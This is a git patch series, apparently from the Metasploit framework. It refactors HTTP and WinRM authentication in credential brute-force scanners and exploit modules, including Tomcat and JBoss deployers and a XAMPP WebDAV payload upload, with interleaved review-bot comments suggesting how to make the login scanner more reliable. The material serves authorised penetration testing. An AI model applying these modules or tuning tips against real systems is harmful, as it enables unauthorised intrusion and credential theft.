with a Singleton Class: + # 1. Get the instance object + # 2. Forward the source_location lookup to the instance + instance ||= ObjectSpace.each_object(owner).first + Object.instance_method(:method).bind(instance).call(name).source_location + end + end + end + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb new file mode 100644 index 0000000000..b8142bfaef --- /dev/null 
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb
@@ -0,0 +1,3 @@
+module MethodSource
+ VERSION = "0.7.1"
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec
new file mode 100644
index 0000000000..83a727d6f6
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec
@@ -0,0 +1,33 @@
+# -*- encoding: utf-8 -*-
+
+Gem::Specification.new do |s|
+ s.name = "method_source"
+ s.version = "0.7.0"
+
+ s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
+ s.authors = ["John Mair (banisterfiend)"]
+ s.date = "2012-01-01"
+ s.description = "retrieve the sourcecode for a method"
+ s.email = "jrmair@gmail.com"
+ s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"]
+ s.homepage = "http://banisterfiend.wordpress.com"
+ s.require_paths = ["lib"]
+ s.rubygems_version = "1.8.10"
+ s.summary = "retrieve the sourcecode for a method"
+ s.test_files = ["test/test.rb", "test/test_helper.rb"]
+
+ if s.respond_to? :specification_version then
+ s.specification_version = 3
+
+ if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
+ s.add_development_dependency(%q, ["~> 1.1.0"])
+ s.add_development_dependency(%q, ["~> 0.9"])
+ else
+ s.add_dependency(%q, ["~> 1.1.0"])
+ s.add_dependency(%q, ["~> 0.9"])
+ end
+ else
+ s.add_dependency(%q, ["~> 1.1.0"])
+ s.add_dependency(%q, ["~> 0.9"])
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb
new file mode 100644
index 0000000000..425e56acf9
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb 
@@ -0,0 +1,122 @@ +direc = File.dirname(__FILE__) + +require 'rubygems' +require 'bacon' +require "#{direc}/../lib/method_source" +require "#{direc}/test_helper" + +describe MethodSource do + + describe "source_location (testing 1.8 implementation)" do + it 'should return correct source_location for a method' do + method(:hello).source_location.first.should =~ /test_helper/ + end + + it 'should not raise for immediate instance methods' do + [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| + lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise + end + end + + it 'should not raise for immediate methods' do + [:a, 1, true, false, nil].each do |immediate| + lambda { immediate.method(:to_s).source_location }.should.not.raise + end + end + end + + before do + @hello_module_source = " def hello; :hello_module; end\n" + @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" + @hello_source = "def hello; :hello; end\n" + @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" + @lambda_comment = "# This is a comment for MyLambda\n" + @lambda_source = "MyLambda = lambda { :lambda }\n" + @proc_source = "MyProc = Proc.new { :proc }\n" + end + + it 'should define methods on Method and UnboundMethod and Proc' do + Method.method_defined?(:source).should == true + UnboundMethod.method_defined?(:source).should == true + Proc.method_defined?(:source).should == true + end + + describe "Methods" do + it 'should return source for method' do + method(:hello).source.should == @hello_source + end + + it 'should return source for a method defined in a module' do + M.instance_method(:hello).source.should == @hello_module_source + end + + it 'should return source for a singleton method as an instance method' do + class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source + end + + it 'should return source for a singleton method' do + 
$o.method(:hello).source.should == @hello_singleton_source + end + + + it 'should return a comment for method' do + method(:hello).comment.should == @hello_comment + end + + + if !is_rbx? + it 'should raise for C methods' do + lambda { method(:puts).source }.should.raise RuntimeError + end + end + end + + # if RUBY_VERSION =~ /1.9/ || is_rbx? + describe "Lambdas and Procs" do + it 'should return source for proc' do + MyProc.source.should == @proc_source + end + + it 'should return an empty string if there is no comment' do + MyProc.comment.should == '' + end + + it 'should return source for lambda' do + MyLambda.source.should == @lambda_source + end + + it 'should return comment for lambda' do + MyLambda.comment.should == @lambda_comment + end + end + # end + describe "Comment tests" do + before do + @comment1 = "# a\n# b\n" + @comment2 = "# a\n# b\n" + @comment3 = "# a\n#\n# b\n" + @comment4 = "# a\n# b\n" + @comment5 = "# a\n# b\n# c\n# d\n" + end + + it "should correctly extract multi-line comments" do + method(:comment_test1).comment.should == @comment1 + end + + it "should correctly strip leading whitespace before comments" do + method(:comment_test2).comment.should == @comment2 + end + + it "should keep empty comment lines" do + method(:comment_test3).comment.should == @comment3 + end + + it "should ignore blank lines between comments" do + method(:comment_test4).comment.should == @comment4 + end + + it "should align all comments to same indent level" do + method(:comment_test5).comment.should == @comment5 + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb new file mode 100644 index 0000000000..53da4e519c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb 
@@ -0,0 +1,50 @@
+def is_rbx?
+ defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/
+end
+
+def jruby?
+ defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/
+end
+
+
+module M
+ def hello; :hello_module; end
+end
+
+$o = Object.new
+def $o.hello; :hello_singleton; end
+
+# A comment for hello
+
+ # It spans two lines and is indented by 2 spaces
+def hello; :hello; end
+
+# a
+# b
+def comment_test1; end
+
+ # a
+ # b
+def comment_test2; end
+
+# a
+#
+# b
+def comment_test3; end
+
+# a
+
+# b
+def comment_test4; end
+
+
+# a
+ # b
+ # c
+# d
+def comment_test5; end
+
+# This is a comment for MyLambda
+MyLambda = lambda { :lambda }
+MyProc = Proc.new { :proc }
+
From 0ae489b37b34abe3f2fabeeb65deb83922d1c800 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Tue, 19 Feb 2013 23:16:46 -0600
Subject: [PATCH 034/139] last of revert-merge snaffu
---
 modules/auxiliary/gather/shodan_search.rb | 4 +-
 .../scanner/http/cisco_device_manager.rb | 4 +-
 modules/auxiliary/scanner/http/http_login.rb | 186 +++---------------
 .../scanner/http/tomcat_mgr_login.rb | 7 +-
 modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 -
 .../auxiliary/scanner/winrm/winrm_login.rb | 6 +-
 modules/auxiliary/scanner/winrm/winrm_wql.rb | 7 +-
 modules/auxiliary/server/http_ntlmrelay.rb | 3 +-
 .../linux/http/piranha_passwd_exec.rb | 6 +-
 modules/exploits/multi/http/axis2_deployer.rb | 4 +-
 .../exploits/multi/http/jboss_bshdeployer.rb | 3 -
 .../exploits/multi/http/jboss_maindeployer.rb | 3 -
 .../exploits/multi/http/tomcat_mgr_deploy.rb | 14 +-
 .../unix/webapp/oracle_vm_agent_utl.rb | 3 -
 modules/exploits/windows/http/easyftp_list.rb | 4 +-
 .../windows/http/xampp_webdav_upload_php.rb | 10 +-
 .../windows/winrm/winrm_script_exec.rb | 23 +--
 17 files changed, 52 insertions(+), 239 deletions(-)
diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb
index 8b114dbdd8..218427cc1f 100644
--- a/modules/auxiliary/gather/shodan_search.rb
+++ b/modules/auxiliary/gather/shodan_search.rb
@@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', + deregister_options('RPORT','RHOST', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') + 'NTLM::UseNTLMv2','SSL') register_options( [ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index fd57fda9bb..9486262be7 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify + web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['BasicAuthPass'].to_s.length == 0 + if datastore['PASSWORD'].to_s.length == 0 report_vuln( { diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 5a6b0ab9a6..4324e312f2 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb 
@@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri_and_scheme + def find_auth_uri - path_and_scheme = [] if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary next if not res end - next if not res.code == 401 - next if not res.headers['WWW-Authenticate'] - path_and_scheme << path - case res.headers['WWW-Authenticate'] - when /Basic/i - path_and_scheme << "Basic" - when /NTLM/i - path_and_scheme << "NTLM" - when /Digest/i - path_and_scheme << "Digest" - end - return path_and_scheme + return path end - return path_and_scheme + return path end def target_url @@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri, @scheme = find_auth_uri_and_scheme() + @uri = find_auth_uri if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return @@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary @uri = "/#{@uri}" if @uri[0,1] != "/" - if ! @scheme - print_error("#{target_url} Incompatible authentication scheme") - return - end - - print_status("Attempting to login to #{target_url} with #{@scheme} authentication") + print_status("Attempting to login to #{target_url}") each_user_pass { |user, pass| do_login(user, pass) 
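Review bot: find_auth_uri in the `@@ -80,21 +79,10 @@` hunk now returns the first path that yields any response at all, because the `res.code == 401` and `WWW-Authenticate` checks were removed together with the scheme detection; the message "No URI found that asks for HTTP authentication" in the `@@ -111,7 +99,7 @@` hunk therefore no longer describes what was tested, and every reachable path gets brute-forced even when it never asks for credentials. Keeping the challenge test is one line before `return path` inside the loop: `next unless res.code == 401 and res.headers['WWW-Authenticate']`. The final `return path` after the loop also looks wrong: if `path` is the block parameter of the enclosing each (its header is outside the hunk), it is out of scope there and raises NameError; `return nil` is what the caller's `if ! @uri` expects.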
@@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - success = false - proof = "" - - ret = do_http_login(user,pass,@scheme) - return :abort if ret == :abort - if ret == :success - proof = @proof.dup - success = true - end - - if success + + response = do_http_login(user,pass) + result = determine_result(response) + + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) + any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) + any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) if any_user == :success user = "anyuser" @@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary :sname => (ssl ? 'https' : 'http'), :user => user, :pass => pass, - :proof => "WEBAPP=\"Generic\", PROOF=#{proof}", + :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}", :source_type => "user_supplied", :active => true ) 
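Review bot: The `:abort` outcome is no longer propagated from do_login: the removed `return :abort if ret == :abort` has no counterpart after `result = determine_result(response)`, so a connection failure (do_http_login returning nil, which determine_result maps to `:abort`) now falls through as an ordinary failed guess and the scan keeps going against a host it cannot reach. Add `return :abort if result == :abort` directly after the determine_result call so the enclosing each_user_pass (outside the hunk) can stop as before. Note also that `PROOF=#{response.to_s}` in the `@@ -175,7 +152,7 @@` hunk writes the whole HTTP response, body included, into the stored credential; the status line and relevant headers would be a smaller and less sensitive proof.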
@@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary end end - def do_http_login(user,pass,scheme) - case scheme - when /NTLM/i - do_http_auth_ntlm(user,pass) - when /Digest/i - do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) - when /Basic/i - do_http_auth_basic(user,pass) - else - vprint_error("#{target_url}: Unknown authentication scheme") - return :abort - end - end - - def do_http_auth_ntlm(user,pass) + def do_http_login(user,pass) begin - resp,c = send_http_auth_ntlm( + response = send_request_cgi({ 'uri' => @uri, + 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - ) - c.close - return :abort if (resp.code == 404) - - if [200, 301, 302].include?(resp.code) - @proof = resp - return :success - end - + }) + return response rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return :abort + return nil end - - return :fail end - def do_http_auth_basic(user,pass) - user_pass = Rex::Text.encode_base64(user + ":" + pass) - - begin - res = send_request_cgi({ - 'uri' => @uri, - 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) - - unless (res.kind_of? 
Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - - return :fail - end - - def do_http_auth_digest(user,pass,requesttype) - path = datastore['AUTH_URI'] || "/" - begin - if requesttype == "PUT" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => 'Test123\r\n', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - elsif requesttype == "PROPFIND" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => '', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass, - 'headers' => { 'Depth' => '0'} - }, 25) - else - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - end - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) - if ((res.code == 201) and (requesttype == "PUT")) - print_good("Trying to delete #{path}") - del_res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => 'DELETE', - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - if not (del_res.code == 204) - print_error("#{path} could be created, but not deleted again. 
This may have been noisy ...") - end - end - @proof = res - return :success - end - - if (res.code == 207) and (requesttype == "PROPFIND") - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - + def determine_result(response) + return :abort unless response.kind_of? Rex::Proto::Http::Response + return :abort unless response.code + return :success if [200, 301, 302].include?(response.code) return :fail end diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 65ab691e66..a3581d16b0 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'") success = false srvhdr = '?' - user_pass = Rex::Text.encode_base64(user + ":" + pass) uri = normalize_uri(datastore['URI']) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } + 'username' => user, + 'password' => pass }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 12f0c70422..88e9e717d6 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' 
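Review bot: determine_result collapses two cases the deleted helpers kept apart: a 404 used to return `:abort` (the URI does not exist, further guesses are pointless) and now returns `:fail`, and the explicit 25-second timeout the old `send_request_cgi({...}, 25)` calls passed is gone from the new do_http_login, so each attempt against a slow target waits for the client default. `return :abort if response.code == 404` before the success line restores the first, and passing the timeout as the second argument to send_request_cgi restores the second. Beyond that, the rewrite hands authentication to the client's 'username'/'password' handling, which in the client.rb hunk later in this series only answers a challenge containing 'Basic'; NTLM and Digest endpoints, which the removed code handled, will now report every credential as failed with no message about the scheme, so at least print `response.headers['WWW-Authenticate']` when the first reply is a 401 that does not offer Basic.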
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index d8012fb723..946903113e 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end each_user_pass do |user, pass| - resp,c = send_request_ntlm(test_request) + resp = send_winrm_request(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index ed09cfd583..0c5eeb6274 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end - - resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index fda08e41c4..080803918b 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb 
@@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', - 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index d87027cadb..85ff71eca8 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']) ], self.class) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res.code == 401 - print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") + print_error("401 Authorization Required! Our Credentials not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 565d73a293..9f030bbbc2 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb 
@@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] - print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) - elsif authmsg + if authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 07d5eb2ada..f350fe4984 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 7c36c1fa16..2297b52569 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index a46cd2c033..2757cb6e13 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb 
@@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote end def check - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target @@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 9865c8716b..3bfd6c668e 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote end def go(command) - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - xml = <<-EOS diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 3484cdf86f..e162cd74f6 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb 
@@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8080), - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']) ], self.class) end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c19096b2c8..f5b21a0499 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), - OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end @@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res,c = send_digest_request_cgi({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'PUT', 'data' => payload.raw, - 'DigestAuthUser' => datastore['RUSER'], - 'DigestAuthPassword' => datastore['RPASS'] + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" 
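Review bot: The switch from send_digest_request_cgi to send_request_cgi in the `@@ -46,12 +46,12 @@` hunk of xampp_webdav_upload_php.rb changes which authentication the PUT can complete: the 'username'/'password' keys are consumed by the client.rb change later in this series, which only adds an Authorization header when the WWW-Authenticate challenge contains 'Basic'. A target that offers only Digest will receive an unauthenticated PUT and the module will just print "Failed to upload file!" with no hint why; adding `print_error "Server challenge: #{res.headers['WWW-Authenticate']}" if res and res.code == 401` in the failure branch lets the operator tell a credential problem from an unsupported scheme.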
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 666ca66d3d..c53314f136 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote @compat_mode = false end - def check - unless accepts_ntlm_auth - print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" - return Msf::Exploit::CheckCode::Safe - end - - return Msf::Exploit::CheckCode::Vulnerable - end - - def exploit - unless check == Msf::Exploit::CheckCode::Vulnerable - return - end unless valid_login? print_error "Login Failure. Recheck your credentials" return @@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote def temp_dir print_status "Grabbing %TEMP%" - resp,c = send_request_ntlm(winrm_open_shell_msg) + resp = send_winrm_request(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp,c = send_request_ntlm(winrm_wql_msg(wql)) + resp = send_winrm_request(winrm_wql_msg(wql)) #Default 